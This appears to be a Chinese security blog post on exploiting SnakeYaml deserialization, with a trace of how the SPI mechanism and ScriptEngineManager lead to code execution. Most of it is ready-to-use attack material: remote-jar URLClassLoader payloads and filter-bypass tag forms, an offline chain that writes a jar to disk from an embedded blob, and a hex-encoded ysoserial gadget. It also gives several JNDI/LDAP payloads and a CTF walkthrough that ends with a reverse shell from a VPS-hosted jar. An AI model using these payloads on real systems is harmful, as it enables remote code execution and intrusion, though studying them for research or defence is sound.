[Java反序列化]—SnakeYaml反序列化

文章首发于跳跳糖:SnakeYaml反序列化及不出网利用

SPI

正文之前先了解一下SPI机制。

SPI全称Service Provider Interface,是Java提供的一套用来被第三方实现或者扩展的接口,它可以用来启用框架扩展和替换组件。 SPI的作用就是为这些被扩展的API寻找服务实现。

  • API (Application Programming Interface)在大多数情况下,都是实现方制定接口并完成对接口的实现,调用方仅仅依赖接口调用,且无权选择不同实现。 从使用人员上来说,API 直接被应用开发人员使用。
  • SPI (Service Provider Interface)调用方来制定接口规范,提供给外部来实现,调用方在调用时则选择自己需要的外部实现。 从使用人员上来说,SPI 被框架扩展人员使用。

简单实现

接口

package snakeYaml.SPI;

public interface SpiService {
    public void say();
}

实现类

SPI1

package snakeYaml.SPI;

public class SPI1 implements SpiService{
    @Override
    public void say() {
        System.out.println("This is SPI->1");
    }
}

SPI2

package snakeYaml.SPI;

public class SPI2 implements SpiService{
    @Override
    public void say() {
        System.out.println("This is SPI->2");
    }
}

在classpath下面创建目录META-INF/services/,在下面创建文件名是上述接口全限定名的文件,在此文件中写入此接口的实现类的全限定名:

image-20221111130904324.png

测试

package snakeYaml.SPI;

import java.util.Iterator;
import java.util.ServiceLoader;

public class SpiDemo {
    public static void main(String[] args) {
       ServiceLoader<SpiService> serviceLoader = ServiceLoader.load(SpiService.class);
//        for (SpiService spiService : serviceLoader) {
//            spiService.say();
//        }
         Iterator<SpiService> iterator = serviceLoader.iterator();
        while (iterator.hasNext()) {
            SpiService spiService = iterator.next();
            spiService.say();
        }
    }
}

RCE

如果存在任意文件写入的话,即构造一个恶意类,并添加到classpath下,导致代码执行

此时将将SPI1中say方法的内容改为calc,当运行后则会造成代码执行

image-20221111140117920.png

流程分析

SPI的核心的逻辑是 ServiceLoader.load() 方法,在ServiceLoader中,存储了默认路径META-INF/services

image-20221111162142297.png

获取到默认路径后断点打到hastNext()上,跟进看一下

image-20221111164736115.png

调用了hasNextService()

public boolean hasNext() {
    if (acc == null) {
        return hasNextService();
    } else {
        .........

接着将默认值PREFIX和在ServiceLoader.load() 中获取到的类名进行拼接,得到犬类名

image-20221111164948141.png

接着调用下边parse(),configs是348行获取到的全类名的资源

pending = parse(service, configs.nextElement());

跟进后发现通过IO流读取到了,文件中的内容,并通过迭代器逐一返回

image-20221111165301209.png

接着就到了下边的next方法

image-20221111160133961.png

再跟进next(),其中返回值是nextService()

image-20221111160206652.png

继续跟进nextService(),首先获取要调用的类名也就是SPI1,通过反射获取该类,接着通过newInstance进行实例化,并retrun返回

image-20221111160603135.png

获取到该类后,调用该类的say方法,弹出计算器

image-20221111160740588.png

SnakeYaml

SnakeYaml是一个完整的YAML1.1规范Processor,用于解析YAML,序列化以及反序列化,支持UTF-8/UTF-16,支持Java对象的序列化/反序列化,支持所有YAML定义的类型。

YAML教程 (yiibai.com)

依赖

<dependency>
    <groupId>com.mchange</groupId>
    <artifactId>c3p0</artifactId>
    <version>0.9.5.2</version>
</dependency>

SnakeYaml有2个方法:

  • Yaml.load():入参是一个字符串或者一个文件,返回一个Java对象;
  • Yaml.dump():将一个对象转化为yaml文件形式

load()

User类

package snakeYaml;

public class User {
    private String name;

    public User() {
    }

    public void setName(String name) {
        this.name = name;
    }

    public String getName() {
        return name;
    }
}

测试

public class SnakeYamlDemo {
    public static void main(String[] args) {
        User user1 = new User();
        user1.setName("Sentiment");
        Yaml yaml = new Yaml();
        System.out.println(yaml.dump(user1));
    }
}

结果

!!snakeYaml.User {name: Sentiment}

!!用于强制类型转换,与fastjson中@type字段类似,!!snakeYaml.User的意思是转换为User类。

dump()

将User类改为

package snakeYaml;

public class User {
    private String name;

    public User() {
        System.out.println("User无参构造器");
    }

    public void setName(String name) {
        System.out.println("User.setName");
        this.name = name;
    }

    public String getName() {
        System.out.println("User.getName");
        return name;
    }
}

此时执行dump

public class SnakeYamlDemo {
    public static void main(String[] args) {
        Yaml yaml = new Yaml();
        String s = "!!snakeYaml.User {name: Sentiment}";
        User user2 = yaml.load(s);
        System.out.println(user2);
    }
}

结果

User无参构造器
User.setName
snakeYaml.User@66cd51c3

和fastjson、jackson一样。调用了无参构造器和setter

而这里有一个问题:

四种属性修饰,private,protected,public,default,若属性设置为public,则不会调用对应的setter方法

调试了一下发现:

当属性为public时,是通过反射对Field进行了set

image-20221111150212658.png

而当属性为private时,是通过反射调用setName设置的值

image-20221111150404075.png

SnakeYaml反序列化

影响版本:全版本

漏洞原理

yaml反序列化时可以通过!!+全类名指定反序列化的类,反序列化过程中会实例化该类,可以通过构造ScriptEngineManagerpayload并利用SPI机制通过URLClassLoader或者其他payload如JNDI方式远程加载实例化恶意类从而实现任意代码执行。

漏洞复现

常用的方式就是通过javax.script.ScriptEngineManager的利用链通过URLClassLoader实现的代码执行。

github上已经有现成的利用ScriptEngineManager利用方式的exp

直接修改要执行的命令即可,除此外可以发现旁边的META-INF.services目录以及其中的文件,由此也可以证明ScriptEngineManager攻击链是通过SPI机制实现的

image-20221111154635145.png

根据项目中的提示,编译文件,会生成yaml-payload.jar包

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

本地开启监听服务

python -m http.server 7777

payload:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:7777/yaml-payload.jar"]
  ]]
]

成功弹出计算器

image-20221111155254025.png

ScriptEngineManager

先看下ScriptEngineManager是如何通过SPI进行恶意执行的

先调用了init(),进行一些初始化设置之后调用initEngines()

image-20221111170058374.png

跟进在下边调用了return getServiceLoader(loader);,接着就是ServiceLoader.load(),对我们自定义的类进行初始化

image-20221111170422430.png

初始化完成后,向下执行又看到了两个熟悉的方法hasNext()next()(SPI中介绍过)

hashNext获取全路径,并读取文件中的内容

next执行文件中对应的类,导致恶意代码执行

image-20221111170636508.png

反序列化流程

接着看一下如何通过load()进行反序列化调用远程jar包的

public <T> T load(String yaml) {
    return (T) loadFromReader(new StreamReader(yaml), Object.class);
}

先跟进StreamReader(),通过StringReader处理我们传入的字符串,将poc存储在StreamReader的this.stream字段值里。

image-20221111192752162.png

接着回到loadFromReader(),首先创建一个Composer对象,并将其封装到constructor()

private Object loadFromReader(StreamReader sreader, Class<?> type) {
    Composer composer = new Composer(new ParserImpl(sreader), resolver, loadingConfig);
    constructor.setComposer(composer);
    return constructor.getSingleData(type);
}

跟进getSingleData()

image-20221111195259054.png

调用getSingleNode()将刚刚传入的payload的!!,变为如下这种带tag的表示,因此存在bypass方式(可参考浅蓝师傅的文章),这个后文再提。

image-20221111195726263.png

所以现在的payload就变为了:

<org.yaml.snakeyaml.nodes.SequenceNode (tag=tag:yaml.org,2002:javax.script.ScriptEngineManager, value=[<org.yaml.snakeyaml.nodes.SequenceNode (tag=tag:yaml.org,2002:java.net.URLClassLoader, value=[<org.yaml.snakeyaml.nodes.SequenceNode (tag=tag:yaml.org,2002:seq, value=[<org.yaml.snakeyaml.nodes.SequenceNode (tag=tag:yaml.org,2002:java.net.URL, value=[<org.yaml.snakeyaml.nodes.ScalarNode (tag=tag:yaml.org,2002:str, value=http://127.0.0.1:9000/yaml-payload.jar)>])>])>])>])>

一共5条值,先留个印象

getSingleNode()执行完后返回这五条数据,给node属性,接着吊用constructDocument()对其进行处理

image-20221111200352482.png

接着跟进constructObject()

image-20221111200449312.png

再跟进constructObjectNoCheck()

protected Object constructObject(Node node) {
    if (constructedObjects.containsKey(node)) {
        return constructedObjects.get(node);
    }
    return constructObjectNoCheck(node);
}

constructObjectNoCheck()recursiveObjects值为空,所以不执行if,并通过add将node追加到其中,之后由于constructedObjects值也是空,所以三目运算执行" : "后边的内容

protected Object constructObjectNoCheck(Node node) {
    if (recursiveObjects.contains(node)) {
        throw new ConstructorException(null, null, "found unconstructable recursive node",
                node.getStartMark());
    }
    recursiveObjects.add(node);
    Construct constructor = getConstructor(node);
    Object data = (constructedObjects.containsKey(node)) ? constructedObjects.get(node)
            : constructor.construct(node);

跟进contruct()

public Object construct(Node node) {
    try {
        return getConstructor(node).construct(node);
    } catch (ConstructorException e) {
        throw e;
    } catch (Exception e) {
        throw new ConstructorException(null, null, "Can't construct a java object for "
                + node.getTag() + "; exception=" + e.getMessage(), node.getStartMark(), e);
    }
}

再跟进constuct()

for (Node argumentNode : snode.getValue()) {
    Class<?> type = c.getParameterTypes()[index];
    // set runtime classes for arguments
    argumentNode.setType(type);
    argumentList[index++] = constructObject(argumentNode);
}

下边通过迭代的方式,调用constructObject()

而到了constructObject()就相当于又回去了,再一次调用

constructObjectNoCheck()->
BaseConstructor#construct()->
Contructor#construct()->
通过迭代Contructor#constructObject()

执行constructObject()后,接着又回去了,连续执行四次,指到recursiveObjects中包含刚才提到的五条值

image-20221111203056008.png

接着一直执行到迭代哪里,执行到下边的newInstance,这里具体的话分为3步,首先是URL的实例化,之后是URLClassLoader的实例化,最终实例化ScriptEngineManager

image-20221111203329889.png

实例化后回到了ScriptEngineManager的流程里,经过一级级调用触发远程代码执行

image-20221111203354253.png

ByPass

前边提到了Bypass,这里记录两种bypass方式

参考:SnakeYaml 反序列化的一个小 trick - 浅蓝 's blog (b1ue.cn)

!<tag:yaml.org,2002:javax.script.ScriptEngineManager> 
[!<tag:yaml.org,2002:java.net.URLClassLoader> [[!<tag:yaml.org,2002:java.net.URL> 
["http://ip/yaml-payload.jar"]]]]
%TAG ! tag:yaml.org,2002:
---
!javax.script.ScriptEngineManager [!java.net.URLClassLoader [[!java.net.URL ["http://ip/yaml-payload.jar"]]]]

不出网利用

C3P0

Fastjson中可以用C3P0.WrapperConnectionPoolDataSource对HEX序列化字节码进行本地调用,而在snakeyaml也可用同样的方式进行不出网利用

根据环境中的依赖选择利用链,这里以CC5为例

java -jar ysoserial-0.0.5.jar CommonsCollections5 "calc" > 1.txt

将字节码文件转为16进制,传入payload中,即可进行恶意字节码加载

!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
userOverridesAsString: 'HexAsciiSerializedMap:16进制数据;'

POC:

public class SnakeYaml {
    public static void main(String[] args) {
        String payload = "!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\n" +
                "userOverridesAsString: 'HexAsciiSerializedMap:ACED00057372002E6A617661782E6D616E6167656D656E742E42616441747472696275746556616C7565457870457863657074696F6ED4E7DAAB632D46400200014C000376616C7400124C6A6176612F6C616E672F4F626A6563743B787200136A6176612E6C616E672E457863657074696F6ED0FD1F3E1A3B1CC4020000787200136A6176612E6C616E672E5468726F7761626C65D5C635273977B8CB0300044C000563617573657400154C6A6176612F6C616E672F5468726F7761626C653B4C000D64657461696C4D6573736167657400124C6A6176612F6C616E672F537472696E673B5B000A737461636B547261636574001E5B4C6A6176612F6C616E672F537461636B5472616365456C656D656E743B4C001473757070726573736564457863657074696F6E737400104C6A6176612F7574696C2F4C6973743B787071007E0008707572001E5B4C6A6176612E6C616E672E537461636B5472616365456C656D656E743B02462A3C3CFD22390200007870000000037372001B6A6176612E6C616E672E537461636B5472616365456C656D656E746109C59A2636DD8502000449000A6C696E654E756D6265724C000E6465636C6172696E67436C61737371007E00054C000866696C654E616D6571007E00054C000A6D6574686F644E616D6571007E000578700000005374002679736F73657269616C2E7061796C6F6164732E436F6D6D6F6E73436F6C6C656374696F6E7335740018436F6D6D6F6E73436F6C6C656374696F6E73352E6A6176617400096765744F626A6563747371007E000B0000003571007E000D71007E000E71007E000F7371007E000B0000002274001979736F73657269616C2E47656E65726174655061796C6F616474001447656E65726174655061796C6F61642E6A6176617400046D61696E737200266A6176612E7574696C2E436F6C6C656374696F6E7324556E6D6F6469666961626C654C697374FC0F2531B5EC8E100200014C00046C69737471007E00077872002C6A6176612E7574696C2E436F6C6C656374696F6E7324556E6D6F6469666961626C65436F6C6C656374696F6E19420080CB5EF71E0200014C0001637400164C6A6176612F7574696C2F436F6C6C656374696F6E3B7870737200136A6176612E7574696C2E41727261794C6973747881D21D99C7619D03000149000473697A657870000000007704000000007871007E001A78737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B657971007E00014C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00017870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D6571007E00055B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E003200000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E00327371007E002B7571007E002F00000002707571007E002F00000000740006696E766F6B657571007E003200000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E002F7371007E002B757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B4702000078700000000174000463616C63740004657865637571007E00320000000171007E00377371007E0027737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000000770800000010000000007878;'";

        Yaml yaml = new Yaml();
        yaml.load(payload);
    }
}

本地文件写入

在fastjson中,可以通过如下命令进行文件写入,而snakeyaml利用方式在很多方面都有很大的相似之处

{
  "@type": "java.lang.AutoCloseable",
  "@type": "sun.rmi.server.MarshalOutputStream",
  "out": {
    "@type": "java.util.zip.InflaterOutputStream",
    "out": {
      "@type": "java.io.FileOutputStream",
      "file": "dst",
      "append": "false"
    },
    "infl": {
      "input": "eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="
    },
    "bufLen": 1048576
  },
  "protocolVersion": 1
}

所以构造snakeyaml的payload:

!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File ["filePath"],false],!!java.util.zip.Inflater  { input: !!binary base64 },1048576]]

filepath是写入路径,base64是我们要写入文件的base64编码

poc:

package snakeYaml;

import org.yaml.snakeyaml.Yaml;

public class SnakeYaml {
    public static void main(String[] args) {
        String payload = "!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\"./yaml-payload.jar\"],false],!!java.util.zip.Inflater  { input: !!binary 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 },1048576]]\n";
        Yaml yaml = new Yaml();
        yaml.load(payload);
    }
}

写入本地之后就可以通过ScriptEngineManager方式进行本地读取了

public class SnakeYaml {
    public static void main(String[] args) {
        String payload = "!!javax.script.ScriptEngineManager [\n" +
                "  !!java.net.URLClassLoader [[\n" +
                "    !!java.net.URL [\"file:///yaml-payload.jar\"]\n" +
                "  ]]\n" +
                "]";
        Yaml yaml = new Yaml();
        yaml.load(payload);
    }
}

image-20221111231030538.png

这里也可以直接用师傅写的脚本:SnakeYaml 之不出网RCE - 先知社区 (aliyun.com)

package com.zlg.serialize.snakeyaml;

import org.yaml.snakeyaml.Yaml;

import java.io.*;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.zip.Deflater;


public class SnakeYamlOffInternet {
    public static void main(String [] args) throws Exception {
        String poc = createPoC("./1.txt","./file/yaml-payload.txt");
        Yaml yaml = new Yaml();
        yaml.load(poc);

    }


    public static String createPoC(String SrcPath,String Destpath) throws Exception {
        File file = new File(SrcPath);
        Long FileLength = file.length();
        byte[] FileContent = new byte[FileLength.intValue()];
        try{
            FileInputStream in = new FileInputStream(file);
            in.read(FileContent);
            in.close();
        }
        catch (FileNotFoundException e){
            e.printStackTrace();
        }
        byte[] compressbytes = compress(FileContent);
        String base64str = Base64.getEncoder().encodeToString(compressbytes);
        String poc = "!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\""+Destpath+"\"],false],!!java.util.zip.Inflater  { input: !!binary "+base64str+" },1048576]]";
        System.out.println(poc);
        return poc;
    }

    public static byte[] compress(byte[] data) {
        byte[] output = new byte[0];

        Deflater compresser = new Deflater();

        compresser.reset();
        compresser.setInput(data);
        compresser.finish();
        ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
        try {
            byte[] buf = new byte[1024];
            while (!compresser.finished()) {
                int i = compresser.deflate(buf);
                bos.write(buf, 0, i);
            }
            output = bos.toByteArray();
        } catch (Exception e) {
            output = data;
            e.printStackTrace();
        } finally {
            try {
                bos.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        compresser.end();
        return output;
    }
}

其它利用方式

JdbcRowSetImpl

跟fastjson调用链一样

payload:

"!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: \"ldap://localhost:9999/Exec\"\n autoCommit: true";

POC:

public class SnakeYaml {
    public static void main(String[] args) {
        String payload = "!!com.sun.rowset.JdbcRowSetImpl\n " +
                "dataSourceName: \"ldap://localhost:9999/Exec\"\n " +
                "autoCommit: true";

        Yaml yaml = new Yaml();
        yaml.load(payload);
    }
}

Spring PropertyPathFactoryBean

需要有spring依赖

<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-beans</artifactId>
    <version>5.3.23</version>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-context</artifactId>
    <version>5.3.23</version>
</dependency>

POC:

public static void main(String[] args) throws Error ,Exception{
    String poc = "!!org.springframework.beans.factory.config.PropertyPathFactoryBean\n" +
            "    targetBeanName: \"ldap://localhost:9999/Exec\"\n" +
            "    propertyPath: Sentiment\n" +
            "    beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory\n" +
            "        shareableResources: [\"ldap://localhost:9999/Exec\"]";
    Yaml yaml = new Yaml();
    yaml.load(poc);
}

Apache XBean

依赖

<dependency>
    <groupId>org.apache.xbean</groupId>
    <artifactId>xbean-naming</artifactId>
    <version>4.22</version>
</dependency>

POC:

public static void main(String[] args) throws Error ,Exception{
    String poc = "!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding [\"foo\",!!javax.naming.Reference [foo, \"Exec\", \"http://localhost:7777/\"],!!org.apache.xbean.naming.context.WritableContext []]]";
    Yaml yaml = new Yaml();
    yaml.load(poc);
}

Apache Commons Configuration

依赖

<dependency>
    <groupId>commons-configuration</groupId>
    <artifactId>commons-configuration</artifactId>
    <version>1.10</version>
</dependency>

POC:

public static void main(String[] args) throws Error ,Exception{
    String poc = "\n" +
            "    ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], \"ldap://localhost:9999/Execs\"]]";
    Yaml yaml = new Yaml();
    yaml.load(poc);
}

C3P0 JndiRefForwardingDataSource

POC:

    String poc = "!!com.mchange.v2.c3p0.JndiRefForwardingDataSource\n" +
            "  jndiName: \"ldap://localhost:9999/Exec\"\n" +
            "  loginTimeout: 0";
    Yaml yaml = new Yaml();
    yaml.load(poc);
}

Resource

依赖

<dependency>
    <groupId>org.eclipse.jetty</groupId>
    <artifactId>jetty-jndi</artifactId>
    <version>9.4.8.v20171121</version>
</dependency>
<dependency>
    <groupId>org.eclipse.jetty</groupId>
    <artifactId>jetty-plus</artifactId>
    <version>9.4.8.v20171121</version>
</dependency>
<dependency>
    <groupId>org.eclipse.jetty</groupId>
    <artifactId>jetty-util</artifactId>
    <version>9.4.8.v20171121</version>
</dependency>

POC:

public static void main(String[] args) throws Error ,Exception{
    String poc = "[!!org.eclipse.jetty.plus.jndi.Resource [\"__/obj\", !!javax.naming.Reference [\"foo\", \"Exec\", \"http://localhost:7777/\"]], !!org.eclipse.jetty.plus.jndi.Resource [\"obj/test\", !!java.lang.Object []]]\n";
    Yaml yaml = new Yaml();
    yaml.load(poc);
}

例题

正好在HECTF中遇到了一道。

littleJava

shiro权限绕过

题目中添加了添加authc拦截器,/admin/*的请求会被拦截,但存在绕过如/admin/*/后边加个斜杠"\",即可绕过,所以访问/admin/hello/即可
image-20221112001448545.png

snakeYaml反序列化

请求/admin/hello/后就能通过data进行yaml反序列化

@RequestMapping({"/admin/hello"})
@ResponseBody
public String admin(@RequestParam(name = "data",required = false) String data, Model model) throws Exception {
    try {
        if (data.startsWith("!!")) {
            return "Hacker!!!";
        } else {
            Yaml yaml = new Yaml();
            yaml.load(data);
            return "Good Yaml";
        }
    } catch (Exception var4) {
        return "Give me one data!";
    }
}

可以直接用现成项目,构造反弹shell命令

image-20221112001437569.png

生成对应jar包

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

将生成的yaml-payload.jar,放到vps上,并监听反弹shell端口

nc -lvnp 10000

最后是构造反序列化,由于上边过滤了!!,因此需要bypass

!<tag:yaml.org,2002:javax.script.ScriptEngineManager> 
[!<tag:yaml.org,2002:java.net.URLClassLoader>
[[!<tag:yaml.org,2002:java.net.URL> 
["http://ip/yaml-payload.jar"]]]]

成功反弹shell
image-20221112001718929.png

参考文章

(2条消息) Java 中经常被提到的 SPI 到底是什么?_肥肥技术宅的博客-CSDN博客